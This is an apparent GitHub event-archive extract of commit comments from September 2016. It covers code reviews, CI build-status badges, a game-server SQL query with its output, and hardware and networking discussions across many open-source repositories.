{"id":"4593491528","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106818,"position":null,"line":null,"path":null,"commit_id":"adf12cf0a2732048ad0cd5cf06c06af74de512da","created_at":"2016-09-21T01:19:23Z","updated_at":"2016-09-21T01:19:23Z","body":"GetInternalVariableBug (mjwitte) - x86_64-MacOS-10.9-clang: OK (2333 of 2333 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-adf12cf0a2732048ad0cd5cf06c06af74de512da-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-21T01:19:23Z"}
{"id":"4593492914","type":"CommitCommentEvent","actor":{"login":"clman94"},"repo":{"name":"clman94/Wolf-Gang-Engine"},"payload":{"comment":{"id":19106822,"position":null,"line":null,"path":null,"commit_id":"6712db6992935910724a05282e2d95177afb05ce","created_at":"2016-09-21T01:19:52Z","updated_at":"2016-09-21T01:19:52Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;HQBF1SBM&#x2F;86-in-game-collision-box-editor\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> In-Game Collision-box Editor</a>"}},"created_at":"2016-09-21T01:19:52Z"}
{"id":"4593497085","type":"CommitCommentEvent","actor":{"login":"dain"},"repo":{"name":"electrum/presto"},"payload":{"comment":{"id":19106831,"position":5,"line":15,"path":"presto-docs/src/main/sphinx/connector/hive-security.rst","commit_id":"549511fc8f34621220f2493e2bd8f58bdfe59f35","created_at":"2016-09-21T01:21:22Z","updated_at":"2016-09-21T01:21:22Z","body":"Those  can use the new `file` one chris wrote.  Additionally, sql standard should work for anyone since it is built into the Hive metastore."}},"created_at":"2016-09-21T01:21:22Z"}
{"id":"4593498747","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19106837,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T01:21:59Z","updated_at":"2016-09-21T01:21:59Z","body":"Flashed on VZW. Stuck at the Sammy Logo. I guess it's looking like Loki could possibly be the culprit?"}},"created_at":"2016-09-21T01:21:59Z"}
{"id":"4593502376","type":"CommitCommentEvent","actor":{"login":"baotao2006"},"repo":{"name":"AsgardCms/Platform"},"payload":{"comment":{"id":19106840,"position":null,"line":null,"path":null,"commit_id":"459abd4cc0563fea09ff19e3780813dddbbe6bc4","created_at":"2016-09-21T01:23:15Z","updated_at":"2016-09-21T01:23:15Z","body":"or \r\n$user = $this->create((array) $data, $activated);"}},"created_at":"2016-09-21T01:23:15Z"}
{"id":"4593503841","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19106844,"position":5,"line":5,"path":"stack/stack.go","commit_id":"2298f8a0d3b806966a36670d789ccc5a2b761d4f","created_at":"2016-09-21T01:23:45Z","updated_at":"2016-09-21T01:23:45Z","body":"Yep I don't expect anyone to use my data structures in production code; I'm\njust trying to learn algorithms and data structures by implementing them in\nGo.\n\nOn Tue, Sep 20, 2016 at 6:12 PM, Joe Tsai <notifications@github.com> wrote:\n\n> In terms of practical usage, a stack is probably not a data structure\n> worth abstracting as a separate package. When you remove the len field,\n> Pop is equivalent to slicing off the last element, Push is equivalent to\n> append.\n>\n> In terms of implementing a stack for your own learning, I think Pop, Push,\n> Len is a perfectly fine set of methods that it should have.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/epkann/Data-Structures/commit/2298f8a0d3b806966a36670d789ccc5a2b761d4f#commitcomment-19105737>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASib12XTgEuwLVG9i_YRNCEVBRpCGSveks5qsGhIgaJpZM4KCOtE>\n> .\n>\n\n\n\n-- \nwww.esthertsai.com\n"}},"created_at":"2016-09-21T01:23:45Z"}
{"id":"4593504792","type":"CommitCommentEvent","actor":{"login":"gizzmojr"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19106848,"position":null,"line":null,"path":null,"commit_id":"94710aab340a3918fd1e1b9ba475f19277ac67c0","created_at":"2016-09-21T01:24:06Z","updated_at":"2016-09-21T01:24:06Z","body":"I'm in no rush, just update my shortcut and good to go. "}},"created_at":"2016-09-21T01:24:06Z"}
{"id":"4593505739","type":"CommitCommentEvent","actor":{"login":"paramat"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":19106850,"position":null,"line":null,"path":null,"commit_id":"3aefa5d3ceaaa9299f42cc10921dec65fa53c5e0","created_at":"2016-09-21T01:24:24Z","updated_at":"2016-09-21T01:24:24Z","body":"Warnings are not always seen and 15 causes a serious and difficult-to-fix lighting bug. So we thought the strictness justified.\r\nIt's no extra work to fix things now instead of later.\r\nHowever we could make it a warning and auto-limit to 14 @sofar ?"}},"created_at":"2016-09-21T01:24:24Z"}
{"id":"4593517089","type":"CommitCommentEvent","actor":{"login":"MASHinfo"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19106875,"position":null,"line":null,"path":null,"commit_id":"0769e2c9af86c73a0720539e82c6477d1393ff7d","created_at":"2016-09-21T01:27:56Z","updated_at":"2016-09-21T01:27:56Z","body":"Sauro (bootleg) don't use SP0256 speech, therefore no speech rom. This must be deleted:\r\n+\tROM_REGION( 0x10000, \"speech\", 0 )\r\n+\t/* SP0256 mask rom */\r\n+\tROM_LOAD( \"sp0256-al2.bin\",   0x1000, 0x0800, CRC(b504ac15) SHA1(e60fcb5fa16ff3f3b69d36c7a6e955744d3feafc) )\r\n\r\nTafoid pointed this out."}},"created_at":"2016-09-21T01:27:56Z"}
{"id":"4593518309","type":"CommitCommentEvent","actor":{"login":"stoshiya"},"repo":{"name":"TatsuyaYamamoto/aws-exercise"},"payload":{"comment":{"id":19106877,"position":3,"line":3,"path":"config.js","commit_id":"2f774dd19133ce1579d6cb5a576e8146942fc839","created_at":"2016-09-21T01:28:23Z","updated_at":"2016-09-21T01:28:23Z","body":"Unix系OSだと一般ユーザは80番ポートでlistenできないので，必須要件を満たせていないのでは?"}},"created_at":"2016-09-21T01:28:23Z"}
{"id":"4593518681","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19106879,"position":586,"line":586,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T01:28:31Z","updated_at":"2016-09-21T01:28:31Z","body":"`neighbor`が`None`の時、if文の中でreturnしていないため、586行目でTracebackが発生しませんか？\r\nまた、`neighbor.state`を設定していますが、そのままメソッドが終了しているため、neighborを返却していませんがよいのでしょうか？\r\n６０９行目で設定するためのものだと思うのですが。\r\n\r\n_peer_up_handler()も同様です。\r\n"}},"created_at":"2016-09-21T01:28:31Z"}
{"id":"4593521979","type":"CommitCommentEvent","actor":{"login":"Keizel"},"repo":{"name":"Darkmet98/vitashell-themes"},"payload":{"comment":{"id":19106886,"position":null,"line":null,"path":null,"commit_id":"656fad21db7f2388f06134b0e0c31659a065d2d2","created_at":"2016-09-21T01:29:45Z","updated_at":"2016-09-21T01:29:45Z","body":"Pusiste \"generó\" y es \"género\".\r\n\r\n¡Saludos!"}},"created_at":"2016-09-21T01:29:45Z"}
{"id":"4593523685","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19106891,"position":610,"line":610,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T01:30:20Z","updated_at":"2016-09-21T01:30:20Z","body":"`peer_down_handler`、`peer_up_handler`にはそれぞれ変数として\r\n`self._peer_down_handler`や`self._peer_up_handler`を設定しているようですが、関数で指定しなければならないのではないでしょうか？"}},"created_at":"2016-09-21T01:30:20Z"}
{"id":"4593526756","type":"CommitCommentEvent","actor":{"login":"ZethFa"},"repo":{"name":"githubschool/open-enrollment-classes-itcj"},"payload":{"comment":{"id":19106898,"position":null,"line":null,"path":null,"commit_id":"1f4f7d2f58ad2faccbc3b47044a14f5fca0bda7f","created_at":"2016-09-21T01:31:21Z","updated_at":"2016-09-21T01:31:21Z","body":"- [ ] Its funny to learn here."}},"created_at":"2016-09-21T01:31:21Z"}
{"id":"4593527903","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19106900,"position":586,"line":586,"path":"ryu/app/rest_vtep.py","commit_id":"fd389b2a52d245cd02426e39608ef0b73b879fd0","created_at":"2016-09-21T01:31:46Z","updated_at":"2016-09-21T01:31:46Z","body":"ありがとうございます。\r\n確かにそうです。\r\n\r\n_peer_down_hanlder() が叩かれる時点で、self.speaker.neighbors に要素がある\"はず\"、\r\nだったので、このルートを走行させておりませんでした。\r\n（使われるのかな...このルート...）\r\n修正します。"}},"created_at":"2016-09-21T01:31:46Z"}
{"id":"4593529192","type":"CommitCommentEvent","actor":{"login":"bobsu78"},"repo":{"name":"bobsu78/hello-world"},"payload":{"comment":{"id":19106905,"position":4,"line":4,"path":"README.md","commit_id":"64b3ca32994bdc7d04429905b39ad74227831a81","created_at":"2016-09-21T01:32:13Z","updated_at":"2016-09-21T01:32:13Z","body":"Remember it and you will be fine! @bobsu78"}},"created_at":"2016-09-21T01:32:13Z"}
{"id":"4593531037","type":"CommitCommentEvent","actor":{"login":"vdh"},"repo":{"name":"caskroom/homebrew-cask"},"payload":{"comment":{"id":19106912,"position":null,"line":null,"path":null,"commit_id":"62411526cb4cf2dc96286e9bc08f92031715c239","created_at":"2016-09-21T01:32:51Z","updated_at":"2016-09-21T01:32:51Z","body":"This change was incorrect, Virtual Box checks for updates but does not install them. It merely prompts you with a download link."}},"created_at":"2016-09-21T01:32:51Z"}
{"id":"4593536832","type":"CommitCommentEvent","actor":{"login":"tkrokli"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19106919,"position":null,"line":null,"path":null,"commit_id":"fc494f1f47f8e9a330c09de67fd4bf7736341bd5","created_at":"2016-09-21T01:34:57Z","updated_at":"2016-09-21T01:34:57Z","body":"Based on the TDB content before this SQL has been run, I think the SQL could be simplified quite a bit.\r\n```sql\r\nSELECT * FROM `smart_scripts` WHERE `entryorguid`IN (25969,28521,28669,2546000,2546001,2852100,2866900);\r\n```\r\n```\r\nentryorguid  source_type      id    link  event_type  event_phase_mask  event_chance  event_flags  event_param1  event_param2  event_param3  event_param4  action_type  action_param1  action_param2  action_param3  action_param4  action_param5  action_param6  target_type  target_param1  target_param2  target_param3  target_x  target_y  target_z  target_o  comment\r\n-----------  -----------  ------  ------  ----------  ----------------  ------------  -----------  ------------  ------------  ------------  ------------  -----------  -------------  -------------  -------------  -------------  -------------  -------------  -----------  -------------  -------------  -------------  --------  --------  --------  --------  ----------------------------------------------------------------------------------\r\n      25969            0       0       1          54                 0           100            0             0             0             0             0           11          46340              0              0              0              0              0            1              0              0              0         0         0         0         0  Jenny - On Just Summoned - Cast Crates Carried\r\n      25969            0       1       0          61                 0           100          512             0             0             0             0            8              0              0              0              0              0              0            1              0              0              0         0         0         0         0  Jenny - On Just Summoned - Set Passive\r\n      25969            0       2       0          32                 0           100            0            50         20000          3000          5000           11          46342              0              0              0              0              0            1              0              0              0         0         0         0         0  Jenny - On Damage - Cast Drop Crate\r\n      25969            0       3       0          23                 0           100          512         46340             0             0             0           41              0              0              0              0              0              0            1              0              0              0         0         0         0         0  Jenny - On Has No Aura (Crates Carried) - Despawn\r\n      25969            0       4       0          75                 0           100            0             0         25849            30             0           11          46358              0              0              0              0              0           23              0              0              0         0         0         0         0  Jenny - Within 30 yards of Fezzix Geartwist - Give Kill credit\r\n      28521            0       0       1          54                 0           100            0             0             0             0             0           11          51868              0              0              0              0              0            1              0              0              0         0         0         0         0  Nass - On Just Summoned - Cast 'Nass Periodic Say'\r\n      28521            0       1       2          61                 0           100            0             0             0             0             0           11          61438              0              0              0              0              0            1              0              0              0         0         0         0         0  Nass - On Just Summoned - Cast 'Nass Heartbeat'\r\n      28521            0       2       3          61                 0           100          512             0             0             0             0            8              1              0              0              0              0              0            1              0              0              0         0         0         0         0  Nass - On Just Summoned - Set Reactstate Defensive\r\n      28521            0       3       0          61                 0           100          512             0             0             0             0           29              0              0              0              0              0              0            7              0              0              0         0         0         0         0  Nass - On Just Summoned - Start Follow Invoker\r\n      28521            0       4       5           8                 0           100            0         51866             0             0             0            5             34              0              0              0              0              0            1              0              0              0         0         0         0         0  Nass - On Spellhit 'Kick Nass' - Play Emote 34\r\n      28521            0       5       6          61                 0           100            0             0             0             0             0           69              0              0              0              0              0              0           19          28523             20              0         0         0         0         0  Nass - On Spellhit 'Kick Nass' - Move To Closest Creature 'Nass Target KC Bunny'\r\n      28521            0       6       0          61                 0           100          512             0             0             0             0           22              1              0              0              0              0              0            1              0              0              0         0         0         0         0  Nass - On Spellhit 'Kick Nass' - Set Event Phase 1\r\n      28521            0       7       0          34                 1           100            0             0             0             0             0           11          51870              0              0              0              0              0           19          28523              5              0         0         0         0         0  Nass - On Reached Point 0 - Cast 'Collect Hair Sample'\r\n      28521            0       8       9           8                 1           100            0         51872             0             0             0           11          51871              0              0              0              0              0           23              0              0              0         0         0         0         0  Nass - On Spellhit 'Hair Sample Collected' - Cast 'Nass Kill Credit' (Phase 1)\r\n      28521            0       9       0          61                 1           100          512             0             0             0             0           80        2852100              2              0              0              0              0            1              0              0              0         0         0         0         0  Nass - On Spellhit 'Hair Sample Collected' - Run Script (Phase 1)\r\n      28521            0      10       0           8                 0           100            0         51867             0             0             0            1              0              0              0              0              0              0            1              0              0              0         0         0         0         0  Nass - On Spellhit 'Nass Say' - Say Line 0 (Phase 1)\r\n      28669            0       0       1          54                 0           100            0             0             0             0             0           11          52191              0              0              0              0              0            1              0              0              0         0         0         0         0  Flying Fiend - On Just Summoned - Cast 'Scourge Disguise'\r\n      28669            0       1       0          61                 0           100          512             0             0             0             0           80        2866900              2              0              0              0              0            1              0              0              0         0         0         0         0  Flying Fiend - On Just Summoned - Run Script\r\n      28669            0       2       0          40                 0           100            0            62         28669             0             0           11          52220              0              0              0              0              0           23              0              0              0         0         0         0         0  Flying Fiend - On Waypoint 62 Reached - Cast 'Kill Credit'\r\n      28669            0       3       0          40                 0           100            0            63         28669             0             0           11          50630              0              0              0              0              0            1              0              0              0         0         0         0         0  Flying Fiend - On Waypoint 63 Reached - Cast 'Eject All Passengers'\r\n    2546000            9       0       0           0                 0           100            0           100           100             0             0           53              1          25460              0              0              0              0            1              0              0              0         0         0         0         0  Amazing Flying Carpet - On Script - Start Waypoint\r\n    2546001            9       0       0           0                 0           100            0             0             0             0             0           15          11636              0              0              0              0              0           23              0              0              0         0         0         0         0  Amazing Flying Carpet - On Script - Quest Credit 'Magic Carpet Ride'\r\n    2546001            9       1       0           0                 0           100            0           500           500             0             0           28          45602              0              0              0              0              0           23              0              0              0         0         0         0         0  Amazing Flying Carpet - On Script - Remove Aura 'Ride Carpet'\r\n    2546001            9       2       0           0                 0           100            0           100           100             0             0           28          46598              0              0              0              0              0           23              0              0              0         0         0         0         0  Amazing Flying Carpet - On Script - Remove Aura 'Ride Vehicle Hardcoded'\r\n    2546001            9       3       0           0                 0           100            0           200           200             0             0           41            200              0              0              0              0              0            1              0              0              0         0         0         0         0  Amazing Flying Carpet - On Script - Despawn In 200 ms\r\n    2852100            9       0       0           0                 1           100            0          1000          1000             0             0           29              0              0              0              0              0              0           23              0              0              0         0         0         0         0  Nass - On Script - Start Follow Owner Or Summoner\r\n    2852100            9       1       0           0                 1           100            0             0             0             0             0           22              0              0              0              0              0              0            1              0              0              0         0         0         0         0  Nass - On Script - Set Event Phase 0\r\n    2866900            9       0       0           0                 0           100            0          1700          1700             0             0           53              1          28669              0              0              0              0            1              0              0              0         0         0         0         0  Flying Fiend - On Script - Start Waypoint\r\n```\r\nThe only part where I am uncertain if it would be wrong or useful to `SET event_flags = event_flags | 0x200` is `WHERE entryorguid = 2852100 AND id = 1` (`Nass - On Script - Set Event Phase 0`). If that line would have a use for `SET event_flags = event_flags | 0x200`, the query could look like this:\r\n```sql\r\nUPDATE `smart_scripts` SET `event_flags`=`event_flags`| 0x200 WHERE `entryorguid` IN\r\n(25969,28521,28669,2546000,2546001,2852100,2866900);\r\n```\r\nIn the TDB 335.61 content before the commit above, 7 of 27 lines already have got `event_flags = 0x200 (512)`"}},"created_at":"2016-09-21T01:34:57Z"}
{"id":"4593538885","type":"CommitCommentEvent","actor":{"login":"ethanstenis"},"repo":{"name":"DrewCCAD/intro-workbook"},"payload":{"comment":{"id":19106926,"position":41,"line":118,"path":"13LessonThirteen/homework/css/style3.css","commit_id":"fd0388f0e2737b16636869132ab2a56f6f2974cf","created_at":"2016-09-21T01:35:41Z","updated_at":"2016-09-21T01:35:41Z","body":"Great job with commenting and labeling. This is a great habit to form and employers will really appreciate this attention to detail."}},"created_at":"2016-09-21T01:35:41Z"}
{"id":"4593539074","type":"CommitCommentEvent","actor":{"login":"dinhtungdu"},"repo":{"name":"ThemeFuse/Unyson-MegaMenu-Extension"},"payload":{"comment":{"id":19106927,"position":null,"line":null,"path":null,"commit_id":"20bc79926e99438ee71794d48f68b5d8557a653b","created_at":"2016-09-21T01:35:45Z","updated_at":"2016-09-21T01:35:45Z","body":"Please mark 1.1.0 as latest release so we can update from admin panel. To date, customers can only update to 1.0.13"}},"created_at":"2016-09-21T01:35:45Z"}
{"id":"4593544312","type":"CommitCommentEvent","actor":{"login":"Insoleet"},"repo":{"name":"duniter/sakia"},"payload":{"comment":{"id":19106940,"position":82,"line":82,"path":"src/sakia/data/repositories/communities.py","commit_id":"433b9970862f536d7282f6c9ef9ef92a23db5000","created_at":"2016-09-21T01:37:42Z","updated_at":"2016-09-21T01:37:42Z","body":"One small question @vtexier , why did you use a LIKE operator for the currency field ?"}},"created_at":"2016-09-21T01:37:42Z"}
{"id":"4593547675","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19106944,"position":null,"line":null,"path":null,"commit_id":"62f04f91cc14ca4c45d6f6db68c793bf33067fa2","created_at":"2016-09-21T01:38:59Z","updated_at":"2016-09-21T01:38:59Z","body":"ReplaceEPLaunchLite (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1193 of 1193 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-62f04f91cc14ca4c45d6f6db68c793bf33067fa2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-21T01:38:59Z"}
{"id":"4593555499","type":"CommitCommentEvent","actor":{"login":"stoshiya"},"repo":{"name":"kenichirofukuda/aws-exercise"},"payload":{"comment":{"id":19106958,"position":5,"line":5,"path":"routes/index.js","commit_id":"3d5394c0c221bfcaf34ec534463129e045a541d2","created_at":"2016-09-21T01:41:49Z","updated_at":"2016-09-21T01:41:49Z","body":"要件としては提示していませんが，ソースコードにURLがハードコードされるとポータビリティが失われてしまいます．この場合ならホスト名を環境変数などで外部から渡せるようにするだけで，CloudFormationのテンプレートにしたときの相性がよくなります．"}},"created_at":"2016-09-21T01:41:49Z"}
{"id":"4593556082","type":"CommitCommentEvent","actor":{"login":"LanceJch"},"repo":{"name":"LanceJch/hi35xx-pjsip"},"payload":{"comment":{"id":19106961,"position":null,"line":null,"path":null,"commit_id":"d6854ab0311ee5bd87d817a2bc6c47e7512d41c1","created_at":"2016-09-21T01:42:02Z","updated_at":"2016-09-21T01:42:02Z","body":"海思音频输入输出接口位置"}},"created_at":"2016-09-21T01:42:02Z"}
{"id":"4593559147","type":"CommitCommentEvent","actor":{"login":"MitchBradley"},"repo":{"name":"quozl/cforth-1"},"payload":{"comment":{"id":19106972,"position":null,"line":null,"path":null,"commit_id":"9d3d888af88428ed460c5dd217f6a8dbf5c57a1e","created_at":"2016-09-21T01:43:07Z","updated_at":"2016-09-21T01:43:07Z","body":"I patched MSL down to something like 10 seconds in the nodemcu tree.  I\ndon't see this being used over long slow links.\n\nOn 9/20/2016 1:45 PM, James Cameron wrote:\n> Thanks. Everything fine now.\n> \n> Yes, it was a rapid-fire connection test. Repeating the test much more\n> slowly, there's no leak. Watching heap over time shows things being\n> released. About 121 seconds is needed to recover from one inbound\n> connection closed by remote host, with a cost of 208 bytes. That's with\n> TCP_MSL default of a minute.\n> \n> |: watch-heap begin get-ticks .d heap-size dup .d cr ( old ) begin key?\n> if drop exit then d# 100 ms heap-size over <> until drop again ; |\n> \n> #define TCP_MSL 60000\n> \n> |874990660 27904 995942438 28112 <-- recovery time 121 seconds 1055211747\n> 27904 1176464003 28112 <-- recovery time 121 seconds |\n> \n> #define TCP_MSL 2000\n> \n> |28392171 31392 48916885 30656 53222070 30864 <-- recovery time 4.3\n> seconds 412671677 30656 416877270 30864 <-- recovery time 4.2 seconds |\n> \n> (Of course, reducing TCP_MSL like this would break long distance\n> connections over very slow links).\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/quozl/cforth-1/commit/9d3d888af88428ed460c5dd217f6a8dbf5c57a1e#commitcomment-19106053>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEoszQ5vuMpg3_LwtsT5bUR9lutiOEoBks5qsHAFgaJpZM4KBTn4>.\n> \n"}},"created_at":"2016-09-21T01:43:07Z"}
{"id":"4593559554","type":"CommitCommentEvent","actor":{"login":"LanceJch"},"repo":{"name":"LanceJch/hi35xx-pjsip"},"payload":{"comment":{"id":19106973,"position":1,"line":1,"path":"pjmedia/src/pjmedia/master_port.c","commit_id":"d6854ab0311ee5bd87d817a2bc6c47e7512d41c1","created_at":"2016-09-21T01:43:16Z","updated_at":"2016-09-21T01:43:16Z","body":"海思音频输入输出接口位置"}},"created_at":"2016-09-21T01:43:16Z"}
{"id":"4593559828","type":"CommitCommentEvent","actor":{"login":"tokuhirom"},"repo":{"name":"tokuhirom/java-handbook"},"payload":{"comment":{"id":19106974,"position":20,"line":20,"path":"spring/mybatis.md","commit_id":"b7ee0d4aa9ca06ec23a40ddc3116c7baec70cbd3","created_at":"2016-09-21T01:43:23Z","updated_at":"2016-09-21T01:43:23Z","body":"うおｗホントだ。直します　＞＜"}},"created_at":"2016-09-21T01:43:23Z"}
{"id":"4593563841","type":"CommitCommentEvent","actor":{"login":"rclations"},"repo":{"name":"INN/Largo"},"payload":{"comment":{"id":19106980,"position":null,"line":null,"path":null,"commit_id":"2de0edcd02ff62a3b8ddce0d1f08b453f65327b8","created_at":"2016-09-21T01:44:47Z","updated_at":"2016-09-21T01:44:47Z","body":"## Old\r\n<img width=\"772\" alt=\"screen shot 2016-09-20 at 9 42 38 pm\" src=\"https://cloud.githubusercontent.com/assets/2522431/18694832/5e0924aa-7f7b-11e6-8e97-df5f36f99acb.png\">\r\n\r\n## New\r\n<img width=\"774\" alt=\"screen shot 2016-09-20 at 9 42 57 pm\" src=\"https://cloud.githubusercontent.com/assets/2522431/18694835/61e83d54-7f7b-11e6-8ce2-efb860482d9b.png\">\r\n"}},"created_at":"2016-09-21T01:44:47Z"}
{"id":"4593566915","type":"CommitCommentEvent","actor":{"login":"KevinHeaton-Money4nothin"},"repo":{"name":"pksunkara/octonode"},"payload":{"comment":{"id":19106982,"position":null,"line":null,"path":null,"commit_id":"4827e5fa56f11b254725665e0e0269bb0db16098","created_at":"2016-09-21T01:45:49Z","updated_at":"2016-09-21T01:45:49Z","body":"****"}},"created_at":"2016-09-21T01:45:49Z"}
{"id":"4593568291","type":"CommitCommentEvent","actor":{"login":"liujiyao"},"repo":{"name":"liujiyao/QXChina"},"payload":{"comment":{"id":19106984,"position":2,"line":2,"path":"README.md","commit_id":"fac1db8df21ff64e77d644dbf13e3a398f809a40","created_at":"2016-09-21T01:46:17Z","updated_at":"2016-09-21T01:46:17Z","body":"试试"}},"created_at":"2016-09-21T01:46:17Z"}
{"id":"4593570202","type":"CommitCommentEvent","actor":{"login":"mattsunsjf"},"repo":{"name":"marklogic/marklogic-contentpump"},"payload":{"comment":{"id":19106988,"position":null,"line":null,"path":null,"commit_id":"d248388f988d4861da56b5c48a690d1d46a74c46","created_at":"2016-09-21T01:46:57Z","updated_at":"2016-09-21T01:46:57Z","body":"I haven't tried other branches. Did you also apply the patch to 8.0-develop (and/or 7.0-develop)?"}},"created_at":"2016-09-21T01:46:57Z"}
{"id":"4593575028","type":"CommitCommentEvent","actor":{"login":"MitchBradley"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19106992,"position":null,"line":null,"path":null,"commit_id":"a5924cf0aa5c7bc55146f3d9bc26212c3e0a87b5","created_at":"2016-09-21T01:48:38Z","updated_at":"2016-09-21T01:48:38Z","body":"I'm using a Wemos D1 Mini with associated MicroSD shield.\n\nhttp://www.wemos.cc/Products/d1_mini.html\nhttp://www.wemos.cc/Products/micro_sd_shield.html\n\nI have several conventional NodeMCUs but I don't have an SD for it.\n\nI'm using the HSPI interface, so the pins are pretty much fixed.\n\n// These are the labeled pin numbers on the NodeMCU module,\n// not the ESP8266 GPIO numbers\n#define HSPI_SCK_PIN  5\n#define HSPI_MISO_PIN 6\n#define HSPI_MOSI_PIN 7\n#define HSPI_HW_CS_PIN 8\n\nOn 9/20/2016 2:37 PM, James Cameron wrote:\n> About time I tested this. What's your pin mapping?\n> \n> What are you using? After rooting around in parts bin, I've a microSD\n> shield <https://www.sparkfun.com/products/retired/9802> which will\n> expose |CS|, |DI|, |DO|, and |CLK|, with the outputs unnecessarily\n> buffered by a 74HC4050. It should do me for bench testing.\n> \n> Longer term, I'll look at the Feather Huzzah\n> <https://www.adafruit.com/product/2821> as there's a handy microSD\n> daughter board <https://www.adafruit.com/products/2922>.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MitchBradley/cforth/commit/a5924cf0aa5c7bc55146f3d9bc26212c3e0a87b5#commitcomment-19106533>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEoszZU47tpBoEuSynDTwP-6PJtIDwYaks5qsHw5gaJpZM4KCSUu>.\n> \n"}},"created_at":"2016-09-21T01:48:38Z"}
{"id":"4593578691","type":"CommitCommentEvent","actor":{"login":"yuanxj1024"},"repo":{"name":"KingBullTeam/dosomething"},"payload":{"comment":{"id":19106997,"position":5,"line":139,"path":"interview.md","commit_id":"e38a633f8cc4a25f426a39ae7405fbcf46c811dd","created_at":"2016-09-21T01:49:54Z","updated_at":"2016-09-21T01:49:54Z","body":"一句话搞定： `'12345678900987654321'.split('').reverse().join('').match(/\\d{1,3}/g).join(',').split('').reverse().join('')`\r\n"}},"created_at":"2016-09-21T01:49:54Z"}
{"id":"4593579371","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19106999,"position":20,"line":114,"path":"index.php","commit_id":"6e6a9d9cb4aca69cc0356fd87f112e04b6354a8c","created_at":"2016-09-21T01:50:11Z","updated_at":"2016-09-21T01:50:11Z","body":"ここif文で、isset($_REQUEST['res'])でvalue値を0にするかどうか判定する必要があるかもしれない"}},"created_at":"2016-09-21T01:50:11Z"}
{"id":"4593582179","type":"CommitCommentEvent","actor":{"login":"amico8"},"repo":{"name":"amico8/seed_sns"},"payload":{"comment":{"id":19107005,"position":20,"line":114,"path":"index.php","commit_id":"6e6a9d9cb4aca69cc0356fd87f112e04b6354a8c","created_at":"2016-09-21T01:51:07Z","updated_at":"2016-09-21T01:51:07Z","body":"ここまでできたら、違うユーザで再度ログインして普通のつぶやきとリプライができることを確認する"}},"created_at":"2016-09-21T01:51:07Z"}
{"id":"4593582183","type":"CommitCommentEvent","actor":{"login":"baader-rene-sorensen"},"repo":{"name":"baaderlogistix/blogic"},"payload":{"comment":{"id":19107006,"position":null,"line":null,"path":null,"commit_id":"f1b45452c31b226d19f9bf176edc6ea90ecd8f4f","created_at":"2016-09-21T01:51:07Z","updated_at":"2016-09-21T01:51:07Z","body":"Is that something good idea"}},"created_at":"2016-09-21T01:51:07Z"}
